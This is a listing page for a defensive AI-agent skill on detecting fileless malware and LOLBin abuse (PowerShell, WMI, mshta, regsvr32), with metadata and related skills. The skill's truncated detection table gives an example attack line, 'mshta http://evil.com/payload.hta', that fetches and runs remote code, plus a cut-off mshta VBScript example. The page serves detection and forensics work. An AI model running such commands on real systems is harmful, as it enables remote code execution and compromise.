detecting-fileless-malware-techniques

Featured

Detects and analyzes fileless malware that operates entirely in memory using PowerShell, WMI, .NET reflection, registry-resident payloads, and living-off-the-land binaries (LOLBins) without writing traditional executable files to disk. Activates for requests involving fileless threat detection, in-memory malware investigation, LOLBin abuse analysis, or WMI persistence examination.

AI & Automation 12,642 stars 1468 forks Updated today Apache-2.0

Install

View on GitHub

Quality Score: 99/100

Stars 20%
100
Recency 20%
100
Frontmatter 20%
70
Documentation 15%
100
Issue Health 10%
50
License 10%
100
Description 5%
100

Skill Content

# Detecting Fileless Malware Techniques ## When to Use - EDR alerts indicate suspicious behavior from trusted system binaries (PowerShell, mshta, wmic, regsvr32) - Investigating attacks that leave no traditional malware files on disk - Analyzing WMI event subscriptions, registry-stored payloads, or scheduled task abuse for persistence - Building detection rules for LOLBin (Living Off the Land Binary) abuse in enterprise environments - Memory forensics reveals malicious code but no corresponding files exist on the filesystem **Do not use** for traditional file-based malware; standard static and dynamic analysis methods are more appropriate for disk-resident malware. ## Prerequisites - Sysmon installed and configured with comprehensive logging (process creation, WMI events, registry changes) - PowerShell Script Block Logging and Module Logging enabled - Volatility 3 for memory forensics of fileless malware artifacts - Process Monitor (ProcMon) for real-time system activity monitoring - Windows Event Log access with adequate retention policies - Autoruns for identifying persistence mechanisms ## Workflow ### Step 1: Identify LOLBin Usage Detect abuse of legitimate Windows binaries for malicious purposes: ``` Commonly Abused LOLBins and Detection Patterns: ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ mshta.exe: Abuse: Execute HTA files with embedded VBScript/JScript Example: mshta http://evil.com/payload.hta Example: mshta vbscript:Execute("CreateObject(""WScript...

Details

Author
mukul975
Repository
mukul975/Anthropic-Cybersecurity-Skills
Created
3 months ago
Last Updated
today
Language
Python
License
Apache-2.0

Similar Skills

Semantically similar based on skill content — not just same category

AI & Automation Featured

detecting-living-off-the-land-attacks

Detect abuse of legitimate Windows binaries (LOLBins) used for living off the land attacks. Monitors process creation, command-line arguments, and parent-child relationships to identify suspicious LOLBin execution patterns.

12,642 Updated today
mukul975
AI & Automation Featured

detecting-fileless-attacks-on-endpoints

Detects fileless malware and in-memory attacks that execute entirely in RAM without writing persistent files to disk, evading traditional antivirus. Use when building detections for PowerShell-based attacks, reflective DLL injection, WMI persistence, and registry-resident malware. Activates for requests involving fileless malware detection, in-memory attacks, PowerShell exploitation, or living-off-the-land techniques.

12,642 Updated today
mukul975
AI & Automation Featured

hunting-for-living-off-the-land-binaries

Proactively hunt for adversary abuse of legitimate system binaries (LOLBins) to execute malicious payloads while evading detection.

12,642 Updated today
mukul975
AI & Automation Featured

hunting-for-lolbins-execution-in-endpoint-logs

Hunt for adversary abuse of Living Off the Land Binaries (LOLBins) by analyzing endpoint process creation logs for suspicious execution patterns of legitimate Windows system binaries used for malicious purposes.

12,642 Updated today
mukul975
AI & Automation Featured

detecting-living-off-the-land-with-lolbas

Detect Living Off the Land Binaries (LOLBins/LOLBAS) abuse including certutil, regsvr32, mshta, and rundll32 via process telemetry, Sigma rules, and parent-child process analysis

12,642 Updated today
mukul975